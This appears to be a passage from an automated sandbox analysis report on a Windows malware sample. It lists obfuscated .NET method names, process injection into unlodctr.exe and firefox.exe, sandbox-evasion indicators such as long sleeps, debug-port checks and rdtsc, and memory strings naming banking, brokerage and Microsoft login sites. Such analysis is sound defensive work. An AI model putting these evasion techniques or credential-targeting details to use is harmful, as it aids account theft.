Source: 0.2.file.exe.73f0000.10.raw.unpack, VRC0Epa8tYXxDHxeeb.cs High entropy of concatenated method names: 'ToString', 'kGBAJOvWYv', 'r7XAB3kLGc', 'KxAAbq6qs1', 'lbhAy6NIni', 'QQgAnOIj6q', 'Ih5AIUULqp', 'mCkA1f0H2w', 'frVA4FbGUG', 'DSkAWqwVv5'
Source: 0.2.file.exe.73f0000.10.raw.unpack, FUd2ZVwwXuVcnVBSTbC.cs High entropy of concatenated method names: 'ToString', 'uu5pK789Ye', 'fwEpYtVWD4', 'd2lpSAB9M8', 'lWdpr6xpTA', 'LOapuOden4', 'JgKpxRs4QB', 'DV0p5gmSEC', 'JMWG9ZpCP5oZyfaOPuX', 'F2aYiepfWyGHprIvsN1'
Source: 0.2.file.exe.73f0000.10.raw.unpack, l5EVrC1ek6BSjKYIJU.cs High entropy of concatenated method names: 'PW6Dr54o4g', 'xtwDxQ3shS', 'DJvDsQ4LMa', 'Wpas73kqVu', 'j1cszL384x', 'GHmDt3YJWt', 'bKCDwMZF4w', 'DCkDch438L', 'BBiDKXym49', 'XlkDYaPC0Z'
Source: 0.2.file.exe.73f0000.10.raw.unpack, Tb6YZsuH878H6WyDR9.cs High entropy of concatenated method names: 'Dispose', 'dfYwdj8aZq', 'ReUcBVAkWL', 'f50aaHLZm9', 'YXZw7MjARv', 'kiHwz7yq35', 'ProcessDialogKey', 'N2ecttFxRG', 'cfucwYorwV', 'evYccwEBUm'
Source: 0.2.file.exe.73f0000.10.raw.unpack, V1T5bBQaeiVe1JDLJI.cs High entropy of concatenated method names: 'jGeeTWPX7E', 'GgneXf2IZx', 'TRDemAPFoI', 'DsXeB99sHL', 'Gv9eyJM0CS', 'lqieniDJhS', 'Hxse18NLFU', 'iZIe4oFQZQ', 'pmleGvTUSa', 'YnbeJoPmNL'
Source: 0.2.file.exe.73f0000.10.raw.unpack, Wd51lrwKXLayvn5vncY.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tbOp9EKD6V', 'WnTpfurdsQ', 'W5hpaQnOc5', 'F30p6ZFJSN', 'Uw0pOkeFRP', 'zQ3pvwg2co', 'yj5p2ZNVV3'
Source: 0.2.file.exe.73f0000.10.raw.unpack, wl1ewjzyRV0uGEBdPo.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VuJZeBuxls', 'PavZkZydOS', 'RiUZATh3VG', 'pSwZqoo6KB', 'dejZM0Z4h8', 'EgmZZd09Fd', 'LvhZpAA7Ay'
Source: 0.2.file.exe.73f0000.10.raw.unpack, qQvjySwtE9dl2fdoVIB.cs High entropy of concatenated method names: 'yPIZi75mrX', 'n1CZlGLXyC', 'esLZjLnQb3', 'JxPZUOrpTJ', 'jYwZCU0Erj', 'U7JZRqGZp2', 'FFRZh0wxe8', 'Q65ZTJNv4G', 'LOeZXiATqP', 'NDjZ8AZ8NK'
Source: 0.2.file.exe.73f0000.10.raw.unpack, ijXhqSg1KPhojxnTQi.cs High entropy of concatenated method names: 'KkmKSq9UBA', 'NfGKrNhAT0', 'ofeKuBZPO9', 'eb3KxqkHWl', 'RBLK59uy56', 'UBdKs3HMOy', 'RRsKDClLw2', 'pn8Kgwxn2q', 'JUGKPD02gy', 'qphK3w4cLB'
Source: 0.2.file.exe.73f0000.10.raw.unpack, bEBUmO7dB0XUGe5lq0.cs High entropy of concatenated method names: 'WAEZw9vNSH', 'tyeZKjVnmB', 'hgLZYIxRWQ', 'FfTZrqm9QW', 'aUSZu4vNsv', 'SDrZ5NE09B', 'd7fZsqaAWT', 'I7jM2NxH94', 'V0mMoqh97K', 'iFdMdfaC7W'
Source: 0.2.file.exe.73f0000.10.raw.unpack, rZJ0oGcihsUEbKChpu.cs High entropy of concatenated method names: 'TGjj9qhQj', 'iD7UHr94Y', 'hliRp79CN', 'WcLhcrHc2', 'IoqXfBvN1', 'exr8cyKHo', 'PhHvUZq3nXO4d90q9c', 'PcOCJpOe9lSgOHFvRf', 'aWIMfieHm', 'ecPp5ykh1'
Source: 0.2.file.exe.73f0000.10.raw.unpack, R7X05391IZAgJ5nYKQ.cs High entropy of concatenated method names: 'tVkkGq3Ug4', 'ijTkHr0mmj', 'sI0k9FSi8w', 'EYykf4oUsU', 'Ew8kB6MAVY', 'V69kbYAwMs', 'UuskyS3IpS', 'Jq3knenSsg', 't4lkIwZVU9', 'd5ck1oTVi8'
Source: 0.2.file.exe.73f0000.10.raw.unpack, sHU9DVX5HX33Zk5IYm.cs High entropy of concatenated method names: 'zr7xUi4GWK', 'zhRxRCX1uE', 'pVCxTq5RBM', 'maHxXpUJxV', 'KK9xkFlqt0', 'GKaxAoCwHD', 'NTlxqHES41', 'kLJxMbnJbq', 'SpOxZgAUjD', 'YTcxpWG2fj'
Source: 0.2.file.exe.73f0000.10.raw.unpack, ntFxRGdKfuYorwVSvY.cs High entropy of concatenated method names: 'zkqMmNppsk', 'SJyMBgLEAU', 'n8HMb8rU3E', 'Oc5My5DsyR', 'Vt8M92Xg7v', 'R6cMnOnxtD', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.73f0000.10.raw.unpack, lra31V8QeglZ3BKldi.cs High entropy of concatenated method names: 'lTt5C93GGD', 'w1S5hcE2hM', 'xpbxbykAfU', 'WGFxyoRP6y', 'dknxnD2eX3', 'phKxIi6aa7', 'hQRx1x6ni8', 'NHvx47jhui', 's1IxWXUxLT', 'coNxGtsQj9'
Source: 0.2.file.exe.73f0000.10.raw.unpack, CbcXJVWp86UMJiRmu7.cs High entropy of concatenated method names: 'XBGDieLWic', 'NumDl7TEDG', 'pV2DjGDfhb', 'B7eDU4yH4C', 'dF8DCQgRhF', 'iTJDR279T6', 'iFyDhiV9Z8', 'JBiDTEdC9r', 'JjwDXBcOsP', 'soKD8pH2yd'
Source: 0.2.file.exe.73f0000.10.raw.unpack, I2uc7WT7LwxsvBMWY7.cs High entropy of concatenated method names: 'CJiu9hC8do', 'DgOufcCFgo', 'TUVuaLPE5A', 'ht9u606ySU', 't5yuOfysly', 'xAwuv0Gc54', 'fhGu2erqCH', 'z3Cuo6yPiT', 'EuDudLXIej', 'JRcu7nehUf'
Source: 0.2.file.exe.73f0000.10.raw.unpack, QAmXL0YFLqgDxjqpau.cs High entropy of concatenated method names: 'SoywD2uc7W', 'YLwwgxsvBM', 't5Hw3X33Zk', 'hIYw0mPra3', 'GKlwkdiRTw', 'vX2wAXDQDK', 'KYQcefMaKc4PjAeOHE', 'alSeW0CvA53PxSNCbN', 'ONKwwK6icv', 'lIywKmsmR9'
Source: 0.2.file.exe.73f0000.10.raw.unpack, CcPDcNvV32VKps9aAw.cs High entropy of concatenated method names: 'oZKqo62bwh', 'KiTq7k6ZQX', 'VOHMtUcQ1W', 'nHGMw2wYnS', 'mWKqJOUH2D', 'UDVqHAsbBM', 'rtjqQ6JVwg', 'A03q9L2IbO', 'o6Wqf3CEja', 'AbeqaVjIPb'
Source: 0.2.file.exe.73f0000.10.raw.unpack, EZMjARovgiH7yq35G2.cs High entropy of concatenated method names: 'BvMMryP1AF', 'I3oMukgVFW', 'zSkMxoSwR1', 'g3CM5qJPZC', 'qrZMs07ygc', 't3kMDU1DU0', 'VLHMg6JWCS', 'dLrMPb4gAr', 'mmNM3VlH9J', 'E79M00oskx'
Source: 0.2.file.exe.73f0000.10.raw.unpack, BTwLX2mXDQDKTRKD7F.cs High entropy of concatenated method names: 'ie9sS1LXTC', 'z2nsuqUaRv', 'PEes5KD9BQ', 'X2AsDXnhf1', 'w8hsgNEDVX', 'c2e5Odhe1D', 'L3S5vh6cDV', 'jYV52IAEqa', 'VW65oUpjTU', 'Kys5d1BnB7'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, VRC0Epa8tYXxDHxeeb.cs High entropy of concatenated method names: 'ToString', 'kGBAJOvWYv', 'r7XAB3kLGc', 'KxAAbq6qs1', 'lbhAy6NIni', 'QQgAnOIj6q', 'Ih5AIUULqp', 'mCkA1f0H2w', 'frVA4FbGUG', 'DSkAWqwVv5'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, FUd2ZVwwXuVcnVBSTbC.cs High entropy of concatenated method names: 'ToString', 'uu5pK789Ye', 'fwEpYtVWD4', 'd2lpSAB9M8', 'lWdpr6xpTA', 'LOapuOden4', 'JgKpxRs4QB', 'DV0p5gmSEC', 'JMWG9ZpCP5oZyfaOPuX', 'F2aYiepfWyGHprIvsN1'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, l5EVrC1ek6BSjKYIJU.cs High entropy of concatenated method names: 'PW6Dr54o4g', 'xtwDxQ3shS', 'DJvDsQ4LMa', 'Wpas73kqVu', 'j1cszL384x', 'GHmDt3YJWt', 'bKCDwMZF4w', 'DCkDch438L', 'BBiDKXym49', 'XlkDYaPC0Z'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, Tb6YZsuH878H6WyDR9.cs High entropy of concatenated method names: 'Dispose', 'dfYwdj8aZq', 'ReUcBVAkWL', 'f50aaHLZm9', 'YXZw7MjARv', 'kiHwz7yq35', 'ProcessDialogKey', 'N2ecttFxRG', 'cfucwYorwV', 'evYccwEBUm'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, V1T5bBQaeiVe1JDLJI.cs High entropy of concatenated method names: 'jGeeTWPX7E', 'GgneXf2IZx', 'TRDemAPFoI', 'DsXeB99sHL', 'Gv9eyJM0CS', 'lqieniDJhS', 'Hxse18NLFU', 'iZIe4oFQZQ', 'pmleGvTUSa', 'YnbeJoPmNL'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, Wd51lrwKXLayvn5vncY.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tbOp9EKD6V', 'WnTpfurdsQ', 'W5hpaQnOc5', 'F30p6ZFJSN', 'Uw0pOkeFRP', 'zQ3pvwg2co', 'yj5p2ZNVV3'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, wl1ewjzyRV0uGEBdPo.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VuJZeBuxls', 'PavZkZydOS', 'RiUZATh3VG', 'pSwZqoo6KB', 'dejZM0Z4h8', 'EgmZZd09Fd', 'LvhZpAA7Ay'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, qQvjySwtE9dl2fdoVIB.cs High entropy of concatenated method names: 'yPIZi75mrX', 'n1CZlGLXyC', 'esLZjLnQb3', 'JxPZUOrpTJ', 'jYwZCU0Erj', 'U7JZRqGZp2', 'FFRZh0wxe8', 'Q65ZTJNv4G', 'LOeZXiATqP', 'NDjZ8AZ8NK'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ijXhqSg1KPhojxnTQi.cs High entropy of concatenated method names: 'KkmKSq9UBA', 'NfGKrNhAT0', 'ofeKuBZPO9', 'eb3KxqkHWl', 'RBLK59uy56', 'UBdKs3HMOy', 'RRsKDClLw2', 'pn8Kgwxn2q', 'JUGKPD02gy', 'qphK3w4cLB'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, bEBUmO7dB0XUGe5lq0.cs High entropy of concatenated method names: 'WAEZw9vNSH', 'tyeZKjVnmB', 'hgLZYIxRWQ', 'FfTZrqm9QW', 'aUSZu4vNsv', 'SDrZ5NE09B', 'd7fZsqaAWT', 'I7jM2NxH94', 'V0mMoqh97K', 'iFdMdfaC7W'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, rZJ0oGcihsUEbKChpu.cs High entropy of concatenated method names: 'TGjj9qhQj', 'iD7UHr94Y', 'hliRp79CN', 'WcLhcrHc2', 'IoqXfBvN1', 'exr8cyKHo', 'PhHvUZq3nXO4d90q9c', 'PcOCJpOe9lSgOHFvRf', 'aWIMfieHm', 'ecPp5ykh1'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, R7X05391IZAgJ5nYKQ.cs High entropy of concatenated method names: 'tVkkGq3Ug4', 'ijTkHr0mmj', 'sI0k9FSi8w', 'EYykf4oUsU', 'Ew8kB6MAVY', 'V69kbYAwMs', 'UuskyS3IpS', 'Jq3knenSsg', 't4lkIwZVU9', 'd5ck1oTVi8'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, sHU9DVX5HX33Zk5IYm.cs High entropy of concatenated method names: 'zr7xUi4GWK', 'zhRxRCX1uE', 'pVCxTq5RBM', 'maHxXpUJxV', 'KK9xkFlqt0', 'GKaxAoCwHD', 'NTlxqHES41', 'kLJxMbnJbq', 'SpOxZgAUjD', 'YTcxpWG2fj'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ntFxRGdKfuYorwVSvY.cs High entropy of concatenated method names: 'zkqMmNppsk', 'SJyMBgLEAU', 'n8HMb8rU3E', 'Oc5My5DsyR', 'Vt8M92Xg7v', 'R6cMnOnxtD', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, lra31V8QeglZ3BKldi.cs High entropy of concatenated method names: 'lTt5C93GGD', 'w1S5hcE2hM', 'xpbxbykAfU', 'WGFxyoRP6y', 'dknxnD2eX3', 'phKxIi6aa7', 'hQRx1x6ni8', 'NHvx47jhui', 's1IxWXUxLT', 'coNxGtsQj9'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, CbcXJVWp86UMJiRmu7.cs High entropy of concatenated method names: 'XBGDieLWic', 'NumDl7TEDG', 'pV2DjGDfhb', 'B7eDU4yH4C', 'dF8DCQgRhF', 'iTJDR279T6', 'iFyDhiV9Z8', 'JBiDTEdC9r', 'JjwDXBcOsP', 'soKD8pH2yd'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, I2uc7WT7LwxsvBMWY7.cs High entropy of concatenated method names: 'CJiu9hC8do', 'DgOufcCFgo', 'TUVuaLPE5A', 'ht9u606ySU', 't5yuOfysly', 'xAwuv0Gc54', 'fhGu2erqCH', 'z3Cuo6yPiT', 'EuDudLXIej', 'JRcu7nehUf'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, QAmXL0YFLqgDxjqpau.cs High entropy of concatenated method names: 'SoywD2uc7W', 'YLwwgxsvBM', 't5Hw3X33Zk', 'hIYw0mPra3', 'GKlwkdiRTw', 'vX2wAXDQDK', 'KYQcefMaKc4PjAeOHE', 'alSeW0CvA53PxSNCbN', 'ONKwwK6icv', 'lIywKmsmR9'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, CcPDcNvV32VKps9aAw.cs High entropy of concatenated method names: 'oZKqo62bwh', 'KiTq7k6ZQX', 'VOHMtUcQ1W', 'nHGMw2wYnS', 'mWKqJOUH2D', 'UDVqHAsbBM', 'rtjqQ6JVwg', 'A03q9L2IbO', 'o6Wqf3CEja', 'AbeqaVjIPb'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, EZMjARovgiH7yq35G2.cs High entropy of concatenated method names: 'BvMMryP1AF', 'I3oMukgVFW', 'zSkMxoSwR1', 'g3CM5qJPZC', 'qrZMs07ygc', 't3kMDU1DU0', 'VLHMg6JWCS', 'dLrMPb4gAr', 'mmNM3VlH9J', 'E79M00oskx'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, BTwLX2mXDQDKTRKD7F.cs High entropy of concatenated method names: 'ie9sS1LXTC', 'z2nsuqUaRv', 'PEes5KD9BQ', 'X2AsDXnhf1', 'w8hsgNEDVX', 'c2e5Odhe1D', 'L3S5vh6cDV', 'jYV52IAEqa', 'VW65oUpjTU', 'Kys5d1BnB7'
Source: 0.2.file.exe.2c49a04.4.raw.unpack, XG.cs High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.file.exe.7060000.9.raw.unpack, XG.cs High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.file.exe.2c38d8c.3.raw.unpack, XG.cs High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unlodctr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 6608, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Memory allocated: 10B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2BE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Memory allocated: 29B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Memory allocated: 7480000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Memory allocated: 8480000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Memory allocated: 8710000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Memory allocated: 9710000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1096E rdtsc 4_2_01A1096E
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\unlodctr.exe API coverage: 2.6 %
Source: C:\Users\user\Desktop\file.exe TID: 6632 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\unlodctr.exe TID: 6668 Thread sleep count: 52 > 30
Source: C:\Windows\SysWOW64\unlodctr.exe TID: 6668 Thread sleep time: -104000s >= -30000s
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe TID: 6628 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\unlodctr.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0036B7C0 FindFirstFileW,FindNextFileW,FindClose, 8_2_0036B7C0
Source: 17-EIW25.8.dr Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: outlook.office.comVMware20,11696508427s
Source: 17-EIW25.8.dr Binary or memory string: discord.comVMware20,11696508427f
Source: 17-EIW25.8.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: 17-EIW25.8.dr Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: 17-EIW25.8.dr Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: 17-EIW25.8.dr Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: 17-EIW25.8.dr Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln'I
Source: 17-EIW25.8.dr Binary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
Source: 17-EIW25.8.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: 17-EIW25.8.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: 17-EIW25.8.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514536705.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.3139663955.000001B969F8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 17-EIW25.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: 17-EIW25.8.dr Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: 17-EIW25.8.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: 17-EIW25.8.dr Binary or memory string: tasks.office.comVMware20,11696508427o
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: 17-EIW25.8.dr Binary or memory string: global block list test formVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: dev.azure.comVMware20,11696508427j
Source: 17-EIW25.8.dr Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: 17-EIW25.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: 17-EIW25.8.dr Binary or memory string: AMC password management pageVMware20,11696508427
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\unlodctr.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_004172A3 LdrLoadDll, 4_2_004172A3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CA197 mov eax, dword ptr fs:[00000030h] 4_2_019CA197
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8C188 mov eax, dword ptr fs:[00000030h] 4_2_01A8C188
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A10185 mov eax, dword ptr fs:[00000030h] 4_2_01A10185
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A74180 mov eax, dword ptr fs:[00000030h] 4_2_01A74180
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5019F mov eax, dword ptr fs:[00000030h] 4_2_01A5019F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA61E5 mov eax, dword ptr fs:[00000030h] 4_2_01AA61E5
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A001F8 mov eax, dword ptr fs:[00000030h] 4_2_01A001F8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A961C3 mov eax, dword ptr fs:[00000030h] 4_2_01A961C3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E1D0 mov eax, dword ptr fs:[00000030h] 4_2_01A4E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E1D0 mov ecx, dword ptr fs:[00000030h] 4_2_01A4E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A00124 mov eax, dword ptr fs:[00000030h] 4_2_01A00124
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov eax, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov ecx, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A90115 mov eax, dword ptr fs:[00000030h] 4_2_01A90115
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7A118 mov ecx, dword ptr fs:[00000030h] 4_2_01A7A118
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7A118 mov eax, dword ptr fs:[00000030h] 4_2_01A7A118
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6154 mov eax, dword ptr fs:[00000030h] 4_2_019D6154
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CC156 mov eax, dword ptr fs:[00000030h] 4_2_019CC156
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A64144 mov eax, dword ptr fs:[00000030h] 4_2_01A64144
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A64144 mov ecx, dword ptr fs:[00000030h] 4_2_01A64144
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A68158 mov eax, dword ptr fs:[00000030h] 4_2_01A68158
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A680A8 mov eax, dword ptr fs:[00000030h] 4_2_01A680A8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A960B8 mov eax, dword ptr fs:[00000030h] 4_2_01A960B8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A960B8 mov ecx, dword ptr fs:[00000030h] 4_2_01A960B8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D208A mov eax, dword ptr fs:[00000030h] 4_2_019D208A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A560E0 mov eax, dword ptr fs:[00000030h] 4_2_01A560E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A120F0 mov ecx, dword ptr fs:[00000030h] 4_2_01A120F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CC0F0 mov eax, dword ptr fs:[00000030h] 4_2_019CC0F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D80E9 mov eax, dword ptr fs:[00000030h] 4_2_019D80E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A520DE mov eax, dword ptr fs:[00000030h] 4_2_01A520DE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CA0E3 mov ecx, dword ptr fs:[00000030h] 4_2_019CA0E3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE016 mov eax, dword ptr fs:[00000030h] 4_2_019EE016
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66030 mov eax, dword ptr fs:[00000030h] 4_2_01A66030
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A54000 mov ecx, dword ptr fs:[00000030h] 4_2_01A54000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A72000 mov eax, dword ptr fs:[00000030h] 4_2_01A72000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CA020 mov eax, dword ptr fs:[00000030h] 4_2_019CA020
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CC020 mov eax, dword ptr fs:[00000030h] 4_2_019CC020
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D2050 mov eax, dword ptr fs:[00000030h] 4_2_019D2050
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FC073 mov eax, dword ptr fs:[00000030h] 4_2_019FC073
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56050 mov eax, dword ptr fs:[00000030h] 4_2_01A56050
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C8397 mov eax, dword ptr fs:[00000030h] 4_2_019C8397
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F438F mov eax, dword ptr fs:[00000030h] 4_2_019F438F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CE388 mov eax, dword ptr fs:[00000030h] 4_2_019CE388
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA3C0 mov eax, dword ptr fs:[00000030h] 4_2_019DA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D83C0 mov eax, dword ptr fs:[00000030h] 4_2_019D83C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A063FF mov eax, dword ptr fs:[00000030h] 4_2_01A063FF
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8C3CD mov eax, dword ptr fs:[00000030h] 4_2_01A8C3CD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A563C0 mov eax, dword ptr fs:[00000030h] 4_2_01A563C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE3F0 mov eax, dword ptr fs:[00000030h] 4_2_019EE3F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A743D4 mov eax, dword ptr fs:[00000030h] 4_2_01A743D4
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E03E9 mov eax, dword ptr fs:[00000030h] 4_2_019E03E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E3DB mov eax, dword ptr fs:[00000030h] 4_2_01A7E3DB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E3DB mov ecx, dword ptr fs:[00000030h] 4_2_01A7E3DB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CC310 mov ecx, dword ptr fs:[00000030h] 4_2_019CC310
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F0310 mov ecx, dword ptr fs:[00000030h] 4_2_019F0310
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A30B mov eax, dword ptr fs:[00000030h] 4_2_01A0A30B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7437C mov eax, dword ptr fs:[00000030h] 4_2_01A7437C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A78350 mov ecx, dword ptr fs:[00000030h] 4_2_01A78350
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5035C mov eax, dword ptr fs:[00000030h] 4_2_01A5035C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5035C mov ecx, dword ptr fs:[00000030h] 4_2_01A5035C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9A352 mov eax, dword ptr fs:[00000030h] 4_2_01A9A352
